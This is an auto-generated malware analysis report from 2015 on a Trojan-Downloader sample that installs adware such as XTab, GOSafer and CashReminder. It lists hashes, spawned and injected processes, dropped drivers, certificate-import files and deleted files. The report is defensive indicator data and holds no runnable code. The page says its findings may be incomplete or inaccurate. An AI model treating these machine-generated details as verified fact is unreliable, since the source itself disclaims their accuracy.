SearchProtectToolbar_pcap_5108469d6a

by malwarelabrobot on April 24th, 2015 in Malware Descriptions.

Trojan-Downloader.NSIS.Adload.bs (Kaspersky), Installer.Win32.InnoSetup.2.FD, Trojan.NSIS.StartPage.FD, Trojan.Win32.Delphi.FD, Trojan.Win32.Sasfis.FD, VirTool.Win32.DelfInject.FD, SearchProtectToolbar_pcap.YR, mzpefinder_pcap_file.YR, SearchProtectToolbar.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan, Installer, VirTool


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 5108469d6aedae76348b6e88ba3e8a65
SHA1: 2004a3616720384de308cec8c31ca91ec824821b
SHA256: 3c57d2e68ac69215ca6c80560b70b90cfdada8461094451d1584aa810e394833
SSDeep: 1536:mQpQ5EP0ijnRTXJOG5ZRr2CEU5170WC3/88fojRhAaS2Wib9xeNhS:mQIURTXJOG5ZRr2Cn550W88R1Bb9gNk
Size: 71088 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2009-12-06 00:50:46
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan-Downloader. Trojan program, which downloads files from the Internet without user's notice and executes them.

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_nj.exe:392
net1.exe:976
net1.exe:2596
net1.exe:2220
net1.exe:2588
q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_ps.exe:1196
310714_is.tmp:1388
ProtectService.exe:3496
ProtectService.exe:3676
ProtectService.exe:3468
XTab_Setup2121.exe:3372
wpm_v20.0.0.1953_0302.exe:3104
q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_gs.exe:248
net.exe:2552
net.exe:1808
net.exe:2556
net.exe:400
QQBrowser.exe:2908
QQBrowser.exe:2216
q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_cr.exe:660
HPNotify.exe:3664
ActSys.exe:2440
q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_br.exe:628
cmdshell.exe:3548
amisetup5755__9664.exe:1532
nfregdrv.exe:976
nfregdrv.exe:1540
q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_a9.exe:452
CashReminder.exe:596
sc.exe:3420
sc.exe:3396
GOSafer.exe:2464
GOSafer.exe:2604
WNet.exe:256
310714_is.exe:1880
q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_am2.exe:1180

The Trojan injects its code into the following process(es):

q2g54WndLShXYB3BIA5JVfobjOB2N_mb_1.exe:1316
ActSys.exe:2648
%original file name%.exe:1396
CashReminder.exe:1232
WNet.exe:2284

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_nj.exe:392 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\import_root_cert.exe (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\certutil.exe (3312 bytes)
%Program Files%\ActSys\ActSys.exe (15536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\import.bat (66 bytes)
%Program Files%\ActSys\asfilterdrv.sys (1856 bytes)
%System%\drivers\asfilterdrv.sys (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\nspr4.dll (6360 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso15.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\nss3.dll (12536 bytes)
%Program Files%\ActSys\remove_ActSys.exe (825 bytes)
%Program Files%\ActSys\ssleay32.dll (12088 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso15.tmp\SelfDel.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\plds4.dll (784 bytes)
%Program Files%\ActSys\nfapi.dll (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\plc4.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso15.tmp\nsExec.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\mozcrt19.dll (23936 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\softokn3.dll (12536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\smime3.dll (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\NJaxSSL.cer (780 bytes)
%Program Files%\ActSys\libeay32.dll (35507 bytes)
%Program Files%\ActSys\nfregdrv.exe (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso15.tmp\SimpleSC.dll (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv13.tmp (130190 bytes)
%Program Files%\ActSys\ProtocolFilters.dll (35001 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso15.tmp\ns19.tmp (6 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\plds4.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\plc4.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso15.tmp\SimpleSC.dll (0 bytes)
%Program Files%\ActSys\asfilterdrv.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso15.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\import_root_cert.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\certutil.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\nspr4.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\softokn3.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso15.tmp\nsExec.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso15.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\mozcrt19.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\import.bat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\nss3.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa12.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\NJaxSSL.cer (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso15.tmp\SelfDel.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso15.tmp\ns19.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\smime3.dll (0 bytes)

The process q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_ps.exe:1196 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\Plain Savings\mj (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\ns14.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Plain Savings\tlg (41 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Plain Savings\lm (128 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\IpConfig.dll (4136 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\NSISEncrypt.dll (3185 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\ns11.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\nsJSON.dll (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\nsExec.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\WmiInspector.dll (3039 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp (4 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\UserInfo.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Plain Savings\mj (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Plain Savings\tlg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Plain Savings\lm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\IpConfig.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskA.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\ns14.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\WmiInspector.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\NSISEncrypt.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\nsJSON.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\nsExec.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Plain Savings (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\ns11.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp (0 bytes)

The process q2g54WndLShXYB3BIA5JVfobjOB2N_mb_1.exe:1316 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AHGJU1UT\MobiMidia_validation[1].js (961 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\verificar_ip[1].php (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\85E349A7\310113f8[1].htm (707 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\i[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl5.tmp (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KPERCTIR\verificar_ip[1].htm (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\85E349A7\010914i[1].htm (734 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AHGJU1UT\s9[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\icone_cadeado[1].gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AHGJU1UT\carregando[1].gif (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq6.tmp\nsWeb.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AHGJU1UT\310113f8[1].htm (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AHGJU1UT\010914i[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KPERCTIR\mt-core[1].js (55269 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KPERCTIR\top-line[1].gif (1 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsq6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AHGJU1UT\s9[1].gif (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl4.tmp (0 bytes)

The process XTab_Setup2121.exe:3372 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\XTab\web\_locales\es-ES\messages.json (3 bytes)
%Program Files%\XTab\web\_locales\pt\messages.json (4 bytes)
%Program Files%\XTab\searchProvider.xml (8 bytes)
%Program Files%\XTab\web\_locales\zh-CN\messages.json (3 bytes)
%Program Files%\XTab\web\_locales\fr-BE\messages.json (3 bytes)
%Program Files%\XTab\web\_locales\pl\messages.json (3 bytes)
%Program Files%\XTab\web\ver.txt (47 bytes)
%Program Files%\XTab\web\img\icon128.png (9 bytes)
%Program Files%\XTab\web\_locales\vi-VI\messages.json (4 bytes)
%Program Files%\XTab\web\_locales\es-419\messages.json (3 bytes)
%Program Files%\XTab\skin\input_bk.png (2 bytes)
%Program Files%\XTab\web\_locales\ru\messages.json (4 bytes)
%Program Files%\XTab\CmdShell.exe (1685 bytes)
%Program Files%\XTab\BrowerWatchCH.dll (23 bytes)
%Program Files%\XTab\web\_locales\fr-FR\messages.json (3 bytes)
%Program Files%\XTab\skin\logo.png (5 bytes)
%Program Files%\XTab\web\js\jquery-1.11.0.min.js (4726 bytes)
%Program Files%\XTab\web\_locales\zh-TW\messages.json (3 bytes)
%Program Files%\XTab\web\_locales\en-US\messages.json (3 bytes)
%Program Files%\XTab\web\_locales\fr-LU\messages.json (3 bytes)
%Program Files%\XTab\web\js\common.js (2 bytes)
%Program Files%\XTab\web\_locales\it-IT\messages.json (4 bytes)
%Program Files%\XTab\skin\conf.xml (8 bytes)
%Program Files%\XTab\skin\btn.png (2 bytes)
%Program Files%\XTab\skin\conf_back.png (1623 bytes)
%Program Files%\XTab\web\js\library.js (4216 bytes)
%Program Files%\XTab\web\_locales\tr-TR\messages.json (4 bytes)
%Program Files%\XTab\install.data (93 bytes)
%Program Files%\XTab\skin\rigth_arrow.png (2 bytes)
%Program Files%\XTab\uninstall.exe (1343 bytes)
%Program Files%\XTab\web\img\google_trends.png (7 bytes)
%Program Files%\XTab\web\data.html (20 bytes)
%Program Files%\XTab\IeWatchDog.dll (20 bytes)
%Program Files%\XTab\skin\radio_2.png (3 bytes)
%Program Files%\XTab\web\js\ga.js (1568 bytes)
%Program Files%\XTab\ffsearch_toolbar!1.0.0.1028.xpi (15 bytes)
%Program Files%\XTab\web\js\jquery.autocomplete.js (12 bytes)
%Program Files%\XTab\web\js\xagainit2.0.js (4 bytes)
%Program Files%\XTab\web\_locales\pt-BR\messages.json (4 bytes)
%Program Files%\XTab\web\_locales\it-CH\messages.json (3 bytes)
%Program Files%\XTab\skin\radio_1.png (3 bytes)
%Program Files%\XTab\msvcp110.dll (16990 bytes)
%Program Files%\XTab\web\_locales\fr-CA\messages.json (3 bytes)
%Program Files%\XTab\web\indexIE.html (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm1C.tmp\System.dll (11 bytes)
%Program Files%\XTab\web\indexIE8.html (1794 bytes)
%Program Files%\XTab\web\_locales\ru-MO\messages.json (4 bytes)
%Program Files%\XTab\web\img\icon48.png (3 bytes)
%Program Files%\XTab\skin\close.png (3 bytes)
%Program Files%\XTab\skin\about.png (4 bytes)
%Program Files%\XTab\web\js\js.js (18 bytes)
%Program Files%\XTab\skin\settings.png (5 bytes)
%Program Files%\XTab\web\img\icon16.png (628 bytes)
%Program Files%\XTab\skin\about_bk.png (1436 bytes)
%Program Files%\XTab\SupTab.dll (15406 bytes)
%Program Files%\XTab\web\js\xagainit-ie8.js (4 bytes)
%Program Files%\XTab\msvcr110.dll (21280 bytes)
%Program Files%\XTab\ProtectService.exe (5309 bytes)
%Program Files%\XTab\skin\main.xml (4 bytes)
%Program Files%\XTab\web\main.css (19 bytes)
%Program Files%\XTab\HPNotify.exe (17941 bytes)
%Program Files%\XTab\conf (1694 bytes)
%Program Files%\XTab\web\img\loading.gif (5 bytes)
%Program Files%\XTab\skin\btn_apply.png (6 bytes)
%Program Files%\XTab\web\img\logo32.ico (4 bytes)
%Program Files%\XTab\BrowserAction.dll (33992 bytes)
%Program Files%\XTab\web\_locales\fr-CH\messages.json (3 bytes)
%Program Files%\XTab\BrowerWatchFF.dll (23 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsm1C.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb1B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm1C.tmp (0 bytes)

The process q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_gs.exe:248 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsm18.tmp\SimpleSC.dll (1856 bytes)
%Program Files%\GOSafer\nfregdrv.exe (1552 bytes)
%Program Files%\GOSafer\gosafer.exe (15536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg17.tmp (66910 bytes)
%System%\drivers\gosaferdrv.sys (55 bytes)
%Program Files%\GOSafer\uninst.exe (1793 bytes)
%Program Files%\GOSafer\ProtocolFilters.dll (9320 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm18.tmp\SelfDel.dll (5 bytes)
%Program Files%\GOSafer\libeay32.dll (35507 bytes)
%Program Files%\GOSafer\ssleay32.dll (12088 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm18.tmp\System.dll (11 bytes)
%Program Files%\GOSafer\nfapi.dll (4992 bytes)
%Program Files%\GOSafer\gosaferdrv.sys (1856 bytes)

The Trojan deletes the following file(s):

%Program Files%\GOSafer\gosaferdrv.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm18.tmp\SimpleSC.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa16.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm18.tmp\SelfDel.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm18.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm18.tmp\System.dll (0 bytes)

The process QQBrowser.exe:2908 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\tmp\wpm_v20.0.0.1953_0302.exe (3566 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\tmp\XTab_Setup2121.exe (17629 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\tmp\479.db (190 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WebDataJs (40 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\tmp\wpm_v20.0.0.1953_0302.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\tmp\XTab_Setup2121.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\DataBase (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\tmp\479.db (0 bytes)

The process QQBrowser.exe:2216 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\istartsurf\images\bg1.png (2 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\Thumbs.db (27 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\UninstallManager.exe (14022 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\uninstallDlg2.xml (15 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\code\code1.jpg (5 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\loading_light.png (139 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\code\code4.jpg (5 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\479.json (512 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (1 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Internet Explorer.lnk (993 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\code\code5.jpg (4 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\code\code3.jpg (5 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\bk_shadow.png (3 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\code\Thumbs.db (42 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\MessageBox.xml (3 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\button1.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\loading_bg.png (159 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\scrollbar.bmp (37 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\checked.png (222 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\checkbox_select.png (783 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\unchecked.png (135 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\code\code6.jpg (5 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\close.png (3 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\code\code2.jpg (4 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\min.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\checkbox.png (545 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\button.png (3 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\bg.png (673 bytes)

The process q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_cr.exe:660 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\CashReminder\ssleay32.dll (12088 bytes)
%Program Files%\CashReminder\nfapi.dll (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw9.tmp\System.dll (11 bytes)
%System%\drivers\crfilterdrv.sys (55 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg8.tmp (67341 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw9.tmp\SelfDel.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw9.tmp\SimpleSC.dll (1856 bytes)
%Program Files%\CashReminder\libeay32.dll (35507 bytes)
%Program Files%\CashReminder\uninstall.exe (1568 bytes)
%Program Files%\CashReminder\nfregdrv.exe (1552 bytes)
%Program Files%\CashReminder\CashReminder.exe (15536 bytes)
%Program Files%\CashReminder\crfilterdrv.sys (1856 bytes)
%Program Files%\CashReminder\ProtocolFilters.dll (9320 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsw9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw9.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw9.tmp\SelfDel.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw9.tmp\SimpleSC.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq7.tmp (0 bytes)
%Program Files%\CashReminder\crfilterdrv.sys (0 bytes)

The process HPNotify.exe:3664 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\XTab\conf (1630 bytes)

The process ActSys.exe:2648 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Temp\ActSys\SSL\NJax Intermediate SSL.cer (782 bytes)
%WinDir%\Temp\P_RuleList.txt (180 bytes)
%WinDir%\Temp\ActSys\SSL\NJax Intermediate SSL.pvk (1 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\rules[1].txt (180 bytes)

The Trojan deletes the following file(s):

%WinDir%\Temp\P_RuleList.txt (0 bytes)

The process q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_br.exe:628 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\WNet\nfregdrv.exe (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz10.tmp\SelfDel.dll (5 bytes)
%Program Files%\WNet\WNet.exe (15168 bytes)
%Program Files%\WNet\uninst.exe (1720 bytes)
%Program Files%\WNet\ssleay32.dll (12088 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsyF.tmp (68079 bytes)
%System%\drivers\ssfilterdrv.sys (55 bytes)
%Program Files%\WNet\ProtocolFilters.dll (9320 bytes)
%Program Files%\WNet\nfapi.dll (4992 bytes)
%Program Files%\WNet\libeay32.dll (35507 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz10.tmp\SimpleSC.dll (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz10.tmp\System.dll (11 bytes)
%Program Files%\WNet\ssfilterdrv.sys (1856 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsz10.tmp\SelfDel.dll (0 bytes)
%Program Files%\WNet\ssfilterdrv.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz10.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsdE.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz10.tmp\SimpleSC.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz10.tmp\System.dll (0 bytes)

The process cmdshell.exe:3548 makes changes in the file system.
The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AHGJU1UT\rebirth[1].htm (0 bytes)

The process amisetup5755__9664.exe:1532 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\amipixel.cfg (107 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KPERCTIR\index[1].htm (2203 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\amipb[1].js (34728 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\amitest.txt (27 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\amipixel.cfg (0 bytes)

The process %original file name%.exe:1396 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\85E349A7\310714_br[1].exe (64683 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\registry.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\310714_am2[1].exe (20504 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\85E349A7\310714_cr[1] (64392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AHGJU1UT\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\nsWeb.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\310714_gs[1] (64683 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_br.exe (64683 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\s9[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_ps.exe (33816 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_nj.exe (110758 bytes)
